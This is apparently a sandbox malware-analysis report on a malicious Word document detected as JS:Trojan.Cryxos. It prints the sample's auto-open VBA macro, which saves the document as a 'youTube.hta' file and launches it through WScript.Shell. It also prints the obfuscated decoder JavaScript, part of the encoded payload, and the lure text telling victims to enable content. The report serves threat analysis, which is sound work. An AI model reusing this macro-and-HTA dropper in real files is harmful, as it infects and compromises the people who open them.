Malicious
Classifications
-
Threat Names
JS:Trojan.Cryxos.7513
Dynamic Analysis Report
Created on 2021-12-01T17:58:00
charge_12.01.2021.doc
Word Document
Remarks
(0x0200004A): 132 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 19 MB.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
---|
C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc | Sample File | Word Document |
malicious
|
...
|
»
Office Information
»
Keywords | ath.ebuTuoy |
Creator | aqbhmx |
Last Modified By | Пользователь Windows |
Revision | 2 |
Create Time | 2021-12-01 11:28:00+00:00 |
Modify Time | 2021-12-01 11:28:00+00:00 |
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | NONE |
Page Count | 1 |
Line Count | 55 |
Paragraph Count | 1 |
Word Count | 116 |
Character Count | 9905 |
Chars With Spaces | 10020 |
ScaleCrop | |
SharedDoc |
VBA Macros (2)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function contents()
ActiveDocument.Content.Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2
End Function
Function keywords()
keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value
contents
End Function
Public Function s(youDoorNext, youLoad)
Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)
End Function
Macro #2: main
»
Attribute VB_Name = "main"
Public Sub autoopen()
lovePowGirl = StrReverse(ThisDocument.keywords)
With ActiveDocument
.SaveAs2 FileName:=lovePowGirl, FileFormat:=2
End With
ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl
End Sub
Document Content Snippet
»
<@1h@1t@1m@1l@1>@1<@1b@1o@1d@1y@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1k@1a@1r@1o@1l@1Y@1o@1u@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1l@1a@1v@1e@1<@1/@1d@1i@1v@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1t@1u@1b@1e@1G@1i@1r@1l@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1=@1Y@1X@1Y@1y@1B@1C@1Z@1v@1d@1X@1W@1v@1V@1H@1I@19@1A@1i@1b@1l@1d@1H@1I@1B@1N@1G@1d@1p@1Z@1X@1Z@1Y@19@1k@1Y@1q@1V@12@1Y@10@1h@1i@1I@1t@1N@1H@1e@1t@1x@1m@1M@1u@1g@1X@1b@1s@1h@1G@1d@10@1B@1n@1I@1p@1s@1D@1Z@1v@1d@1X@1W@1v@1V@1n@1L@1v@1B@1X@1Z@1u@1h@1i@1I@1H@1V@1E@1V@1i@1w@1C@1I@1i@1g@1G@1d@10@1B@1n@1O@1v@18@1y@1d@1p@15@1m@1c@1l@15@1G@1d@1h@1x@12@1c@1y@1A@1T@1M@13@1I@1m@1L@1j@19@1W@1b@1v@1Q@1X@1Z@1n@1p@13@1L@1R@1J@1z@1N@13@1E@12@1R@13@1Y@10@1a@1O@1l@1D@1c@1B@1N@1W@1Y@1X@1R@1k@1Z@1G@1x@12@1R@1O@1J@1U@1Z@11@1F@1W@1c@1H@1V@1G@1Z@14@1k@12@1L@1i@1F@12@1V@1l@1h@1H@1V@1R@19@12@1R@15@1F@1U@1Q@16@1x@1k@1U@1v@1E@1U@ ... |
Extracted Image Texts (1)
»
Image 1: image1.gif
»
This document created in previous version of Hicrosoft Office Word
To view or edit this document. please click “Enable editing” button
on the top bar. and then click “Enable content”
YARA Matches (1)
»
Rule Name | Rule Description | Classification | Score | Actions |
---|---|---|---|---|
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - |
2/5
|
...
|
c:\users\rdhj0cnfevzx\documents\~wrd0000.tmp | Dropped File | HTML |
malicious
|
...
|
»
AV Matches (2)
»
Threat Name | Verdict |
---|---|
JS:Trojan.Cryxos.7513 |
malicious
|
JS:Trojan.Cryxos.7513 |
malicious
|
Extracted JavaScripts (4)
»
JavaScript #1
»
function doorKarolDoor(girlLoveKarol){return(new ActiveXObject(girlLoveKarol));}function tubePow(powTubeTube){return(loveDoorLove.getElementById(powTubeTube).innerHTML);}function karolDoorKarol(likeLikeLoad){return('cha' + likeLikeLoad);}function dowLoadDoor(loadPowPow){var doorTube = tubePow('loveKarolLoad');var loveGirlLoad = "";var tubeLove, loveLikeLove, loadLoad;var powNextKarol, tubeDowDoor, loveLoveDoor, loveYouYou;var tubeKarolYou = 0;loadPowPow = loadPowPow.replace(/[^A-Za-z0-9\+\/\=]/g, "");while(tubeKarolYou < loadPowPow.length){powNextKarol = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));tubeDowDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));loveLoveDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));loveYouYou = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));tubeLove = (powNextKarol << 2) | (tubeDowDoor >> 4);loveLikeLove = ((tubeDowDoor & 15) << 4) | (loveLoveDoor >> 2);loadLoad = ((loveLoveDoor & 3) << 6) | loveYouYou;loveGirlLoad = loveGirlLoad + String.fromCharCode(tubeLove);if(loveLoveDoor != 64){loveGirlLoad = loveGirlLoad + String.fromCharCode(loveLikeLove);}if(loveYouYou != 64){loveGirlLoad = loveGirlLoad + String.fromCharCode(loadLoad);}}return(loveGirlLoad);}function loadKarolLike(likeLoveDow){return likeLoveDow.split('').reverse().join('');}function loadTubeNext(likeLikeLoad){return(loadKarolLike(dowLoadDoor(loadKarolLike(likeLikeLoad))));}function loadLoadGirl(likeLikeLoad, youPowKarol){return(likeLikeLoad.split(youPowKarol));}likePowLoad = window;loveDoorLove = document;likePowLoad.moveTo(-10, -10);var girlTubeTube = tubePow('tubeGirl').split("|||");var loveNextLove = loadTubeNext(girlTubeTube[0]);var karolLoadDoor = loadTubeNext(girlTubeTube[1]);
JavaScript #2
»
function nextLovePow(girlPow){likePowLoad[loadKarolLike(tubePow('karolYou'))](girlPow);}
JavaScript #3
»
Call nextLovePow(loveNextLove) : Call nextLovePow(karolLoadDoor)
JavaScript #4
»
likePowLoad['close']();
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.word\~wrd0003.doc | Dropped File | Unknown |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\documents\~$outube.hta | Dropped File | Stream |
clean
|
...
|
»